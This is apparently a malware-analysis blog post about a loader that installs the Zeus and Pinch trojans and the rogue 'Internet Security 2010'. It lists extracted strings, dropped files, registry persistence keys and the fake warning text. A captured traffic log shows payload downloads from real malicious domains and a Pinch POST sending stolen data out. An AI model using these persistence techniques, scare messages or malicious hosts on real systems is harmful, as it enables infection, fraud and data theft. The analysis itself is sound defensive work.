Welcome to the jungle: Zeus + Pinch + Rogue Software

This second part of our part 1 analysis, will show you what the files we collected did once live. From the main loader we can extract the following useful strings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msxslt3.exe
MsXSLT
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\ntdll.dll
wininet.dll
Content-Type: application/x-www-form-urlencoded
POST
tmpf
\msxslt.dat
Google Bot
explorer.exe
__SYSTEM32_MSXSLT_
svchost.exe
\\.\pipe\_SYSTEM_MSXML_RUN_
ftpdata=1&user=%s&pass=%s&host=%s
SeDebugPrivilege

We can see various references to a file name msxslt3.exe and it is possible to notice that it will be added in the registry startup key Run\MsXSLT. We can see the malware will send out data to an external website using the method “POST” and we can see also a reference to “Google Bot”, that is probably the user agent that will be used by the malware to execute the POST query.

The reference “__SYSTEM32_MSXSLT_” should be the name of the mutex that will be created to limit the malware to run a single time in the infected system. The two processes name “explorer.exe” and “svchost.exe” are the processes the malware will inject code to. And finally we can see an interesting string:

1
ftpdata=1&user=%s&pass=%s&host=%s

From the above string, we can assume the malware will send data to an ftp server (ftpdata=1) and it will be passed 3 variables, respectively the username, the password and the hostname.

From the other unpacked file, we can extract following data:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
wget 3.0
Click here to protect your computer from spyware!
Application cannot be executed. The file is infected. Please activate your antivirus software.
WARNING
Advanced Virus Remover installed.
SETUP
winupdate.exe
\Internet Explorer\iexplore.exe 
%s\IS15.exe
hxxp://buyinternetsecurity-2010.com/buy/?code=%s
hxxp://buyinternetsecurity-2010.com/?code=%s
C:\Program Files\InternetSecurity2010\IS2010.exe
AcroRd32.exe
rstrui.exe
CloneCD.exe
cmd.exe
digitaleditions.exe
freecell.exe
FullTiltPoker.exe
GOM.exe
hrtzzm.exe
Icq.exe
Illustrator.exe
miranda32.exe
control.exe
notepad.exe
calc.exe
Attention! System detected a potential hazard (TrojanSPM/LX) on your computer that may infect executable files. You private information and PC safety is at risk. To get rid of unwanted spyware and keep your computer safe you need update your current security software. Click OK to download official intrusion detection system (IDS software)
WARNING
%s\%d.exe
hxxp://testavrdown.com/cgi-bin/get.pl?l=%s
hxxp://vs-codec-pro.net/form.php?code=%s
Windows can`t play the folowing media formats: AVI;WMV;AVS;FLV;MKV;MOV;3GP;MP4;MPG;MPEG;MP3;AAC;WAV;WMA;CDA;FLAC;M4A;MID. Update your video and sound codec to resolve this issue.
Fatal Error
regsvr32 /s %s
%s\helper32.dll
hxxp://downloadavr25.com/dfghfghgfj.dll
hxxp://downloadavr25.com/cgi-bin/download.pl?code=%s
hxxp://downloadavr25.com/loads.php?code=%s
%s\warning.html
Spyware Alert!
winlogon32.exe
smss32.exe
Software\Microsoft\Windows\CurrentVersion\Run
%s%s
%s\winlogon32.exe
%s\smss32.exe
NoActiveDesktopChanges
NoChangingWallpaper
Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
NoSetActiveDesktop
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
DisableTaskMgr
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\IS2010
Software\AVR
Software\RealAV
Userinit
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
userinit.exe
Software\AntivirusXP
faa56ae0-fc64-41fc-b286-fed9abcd401e
Software
8636065b-fef0-4255-b14f-54639f7900a4

We can see from the data above that the file in question is the executable of the rogue security software named IS2010.exe (Internet Security 2010). We can see that this rogue will install files in system directories, will hijack the registry disabling the task manager and other important features, will hijack the execution of pre-defined processes or files (such as regedit.exe or movie files), and will show fake security warnings when an user run the specific processes or try to watch a movie. The alerts that should be generated when an user try to open the “blacklisted” processes or when try to play a movie are the following:

1
2
Application cannot be executed. The file is infected. Please activate your antivirus software.
Windows can`t play the folowing media formats: AVI;WMV;AVS;FLV;MKV;MOV;3GP;MP4;MPG;MPEG;MP3;AAC;WAV;WMA;CDA;FLAC;M4A;MID. Update your video and sound codec to resolve this issue.

Fake alert in action:

Screenshot

We can also see all the text that is used in the false security warnings started by this rogue. The user agent that the malware will use to query the malicious website downloadavr25(dot)com is “wget 3.0” and if we try to query the website with a different user agent, then the website should deny our query.

An interesting thing is that we can see also references to registry keys and files that are not related to Internet Security 2010 but are related to other rogue security software:

1
2
3
Software\AVR
Software\RealAV
Software\AntivirusXP

We have noticed also a very interesting data inside the unpacked executable that looks like a obfuscaped javascript code:

Screenshot

The content of the above ofuscated javascript code is copied by the malware in the file warning.html that is placed in the system32 folder.

When the main loader is executed, it creates the following files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
C:\DOCUME~1\user\LOCALS~1\Temp\teste1_p.exe
C:\DOCUME~1\user\LOCALS~1\Temp\q1.exe
C:\DOCUME~1\user\LOCALS~1\Temp\avto.exe
C:\DOCUME~1\user\LOCALS~1\Temp\6_ldry3.exe
C:\DOCUME~1\user\LOCALS~1\Temp\5_odbn0.exe
C:\DOCUME~1\user\LOCALS~1\Temp\4_pinnew.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2_load.exe
C:\DOCUME~1\user\LOCALS~1\Temp\0_11adwara.exe
C:\WINDOWS\system32\sdra64.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca0.exe
C:\WINDOWS\system32\lowsec
C:\WINDOWS\system32\lowsec\local.ds
C:\WINDOWS\system32\lowsec\user.ds
C:\WINDOWS\system32\smss32.exe
C:\WINDOWS\system32\winlogon32.exe
C:\WINDOWS\svc.exe
C:\WINDOWS\odbn0.exe
C:\WINDOWS\system32\helper32.dll
C:\WINDOWS\system32\IS15.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca2.exe
C:\WINDOWS\system32\41.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca1.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25caa.exe
C:\WINDOWS\lsass.exe
C:\Program Files\InternetSecurity2010
C:\DOCUME~1\user\LOCALS~1\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
C:\Program Files\InternetSecurity2010\IS2010.exe
C:\DOCUME~1\user\Desktop\Internet Security 2010.lnk
C:\DOCUME~1\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Security 2010.lnk
C:\DOCUME~1\user\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Security 2010.lnk
C:\WINDOWS\system32\18467.exe

Note that all the above files were created during a 24 hours time from the first run of the main loader. The loader adds most of the recently created executable files to the registry startup keys to make sure all the malicious files are started everytime Windows is booted.

We can see a screenshot of malicious running processes:

Screenshot

This is a screenshot of all created files:

Screenshot

From the files that have been created we can see that the loader installs a lot of malicious files, in particular we can see that it is installed the famous ZeuS Trojan (sdra64.exe), the rogue security software Internet Security 2010 (IS2010.exe), BHOs (helper32.dll), the famous Pinch Trojan (4_pinnew.exe) and other very dangerous kind of trojans in the Temp folder.

We have noticed also various ring3 API hooks installed by sdra64.exe and other executables that hide their presence in the system by making hidden the files from the regular explorer searches and from all the other file searches made by user-mode applications. The files are also hidden from the task manager since the process of Zeus sdra64.exe is hidden too.

The infected system is now esposed to a very high risk of sensitive data theft and of being used as fraudulent base to host malicious files or to launch attacks such as DDoS or malware spreading on famous P2P platforms like eMule and Torrents. In particular what make the computer at a very risk of data theft are the two famous trojans used mainly only to steal Bank Accounts, Credit Cards Details, Identity and to keystroke everything that is typed by the keyboard:

  • Zeus Trojan
  • Pinch Trojan

After the hidden execution of the rogue security software Internet Security 2010 the system started to become very unstable. Most executables that are generally used to analyze the system such as regedit.exe and taskmgr.exe could not be started:

Screenshot

A very simple and quick workaround fix to be able to run regedit.exe and taskmgr.exe is to copy the files under C:\ and rename them respectively:

1
2
C:\regedit.exe -> C:\r.exe
C:\taskmgr.exe -> C:\t.exe

Screenshot

Now it will be possible to inspect the registry with r.exe (regedit) and check running processes with t.exe (taskmgr). Also a lot of other files related to freeware and commercial applications of any gender, from security software to video conversion software, could not be started and when the user try to run a “blacklisted” process, the rogue software will start to show aggressive fake security warnings stating the file is infected.

From these images we can clearly see the rogue security software Internet Security 2010 in action during a fake system scan and when it display the fake security warnings stating the system is infected by a huge number of trojans (even if in this case is true LOL):

Screenshot

Screenshot

Screenshot

This is a part of the logged network traffic during the malware infection:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
GET /lightbox/js/r/files/tasks/AC HTTP/1.1
Host: sexzoznamka.eu
 
GET /lightbox/js/r/robo.php?r=1 HTTP/1.1
Host: sexzoznamka.eu
 
GET /cgi-bin/download.pl?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /dfghfghgfj.dll HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /loads.php?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /lightbox/js/r/robo.php?r=4 HTTP/1.1
Host: sexzoznamka.eu
 
GET /cgi-bin/get.pl?l=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: testavrdown.com
 
UDP:53 -> autouploaders.net
UDP:53 -> sruprekut.net
UDP:53 -> greatinstant.net
 
GET /mass/tds2.php HTTP/1.1
Host: autouploaders.net
 
GET /123.exe HTTP/1.1
Host: plugininput.com
 
GET /nop/tds2.php HTTP/1.1
Host: saloongins.net
 
GET /in.cgi?16 HTTP/1.1
Host: promotds.com
 
GET /pi.php HTTP/1.1
Host: kingsizematures.com
 
GET / HTTP/1.1
Host: interno-porn.com
 
GET /pi.php HTTP/1.1
Host: interno-porn.com
 
GET /lightbox/js/r/robo.php?r=5 HTTP/1.1
Host: sexzoznamka.eu
 
POST /gate/gate.php HTTP/1.0
Host: moretds.in
Content-Length: 1612
a=vaska_1@123mail.ru&b=pinch3_report&d=report.bin&c=xxx
 
GET /out.php?t=3.0.2.231&url=xxx=&s=3 HTTP/1.1
Host: interno-porn.com
 
GET / HTTP/1.1
Host: www.nasty-xx.net
 
GET /js2/33311.php?view=h HTTP/1.1
Host: pages.etology.com
 
GET /transformer/v4/ads2.js HTTP/1.1
Host: media.etology.com
 
GET /search.php?qq=xxx HTTP/1.1
Host: getgreatguide.in
 
GET /s/exx.php HTTP/1.1
Host: getgreatguide.in

From the above traffic we can see that the malware uses the domain

1
2
GET /lightbox/js/r/robo.php?r=1 HTTP/1.1
Host: sexzoznamka.eu

To launch commands, infact we can see that the number:

1
robo.php?r=1

Change based on the traffic received or sent, so we presume it change everytime a specific action has been terminated and by changing the number it will start a new action associated with the number.

We can see various domains used to spread the TDSS trojan:

1
2
3
GET /mass/tds2.php HTTP/1.1
GET /123.exe HTTP/1.1
GET /nop/tds2.php HTTP/1.1

And we can also see that a domain is used for receive the report that contains all the sensitive data stolen from the infected computer, the data is then sent to a specific email address:

1
2
3
4
POST /gate/gate.php HTTP/1.0
Host: moretds.in
Content-Length: 1612
a=vaska_1@123mail.ru&b=pinch3_report&d=report.bin&c=xxx

The above data can identify the traffic generated by the Pinch trojan.

We can also see the domain from which the malware has downloaded the files related to the rogue software Internet Security 2010:

1
2
3
GET /loads.php?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com

We have scanned the infected computer with Hijack Hunter and below there are all the malware traces extracted from the log file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
[+] Running processes
 
C:\DOCUME~1\user\LOCALS~1\teste1_p.exe (354304 bytes) (Unknown) (f49588f405759025573272186038ffc5)
C:\DOCUME~1\user\LOCALS~1\q1.exe (293888 bytes) (Unknown) (811805ec29c6f3e0e479e0e8bad9dbff)
C:\WINDOWS\system32\smss32.exe (18944 bytes) (Unknown) (3aa2b2dbb73cebcb67f6e0ef2ce313d1)
C:\Program Files\InternetSecurity2010\IS2010.exe (1117184 bytes) (Internet Security) (d86468b427a31d2c6348256f7a1a03a7)
C:\DOCUME~1\user\LOCALS~1\5_odbn0.exe (295424 bytes) (Unknown) (c70ba51397f3ef815589cd4917699b15)
C:\Program Files\InternetSecurity2010\IS2010.exe (1117184 bytes) (Internet Security) (d86468b427a31d2c6348256f7a1a03a7)
 
[+] Registry startups
 
Value: smss32.exe
Data: C:\WINDOWS\system32\smss32.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: netc
Data: C:\WINDOWS\svc.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: odbny0
Data: C:\WINDOWS\odbn0.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: lsass
Data: C:\WINDOWS\lsass.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: Internet Security 2010
Data: C:\Program Files\InternetSecurity2010\IS2010.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: Userinit
Data: C:\WINDOWS\system32\winlogon32.exe,C:\WINDOWS\system32\sdra64.exe,
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
 
[+] Windows Firewall allowed programs
 
Value: C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe
Data: C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe:*:Enabled:Enabled
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
 
[+] Windows Hijacks
 
Value: DisableTaskMgr
Data: 1
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
 
Value: NoChangingWallpaper
Data: 1
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
 
Value: NoChangingWallpaper
Data: 1
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
 
[+] Executables in Temp folders
 
C:\DOCUME~1\user\LOCALS~1\0_11adwara.exe (18944 bytes) (Unknown) (3aa2b2dbb73cebcb67f6e0ef2ce313d1)
C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe (44032 bytes) (Unknown) (4b4440b36ec91d2ca8084735760109fd)
C:\DOCUME~1\user\LOCALS~1\5_odbn0.exe (295424 bytes) (Unknown) (c70ba51397f3ef815589cd4917699b15)
C:\DOCUME~1\user\LOCALS~1\60325cahp25caa.exe (2661888 bytes) (Unknown) (6411876d41f55fa21003afe9256b24d2)
C:\DOCUME~1\user\LOCALS~1\6_ldry3.exe (84992 bytes) (Unknown) (180ef4d8f204fdd201909f06ed174a8b)
C:\DOCUME~1\user\LOCALS~1\avto.exe (295936 bytes) (Unknown) (a66bbd3944586e428029533e3ce80d60)
C:\DOCUME~1\user\LOCALS~1\q1.exe (293888 bytes) (Unknown) (811805ec29c6f3e0e479e0e8bad9dbff)
C:\DOCUME~1\user\LOCALS~1\teste1_p.exe (354304 bytes) (Unknown) (f49588f405759025573272186038ffc5)
 
[+] TCP Connections
 
smss32.exe -> 127.0.0.1:1042 -> 193.104.153.30:80 -> CLOSE_WAIT
q1.exe -> 127.0.0.1:1050 -> 89.248.172.136:80 -> ESTABLISHED
q1.exe -> 127.0.0.1:1052 -> 89.248.168.69:80 -> ESTABLISHED

Random Posts

Previous Posts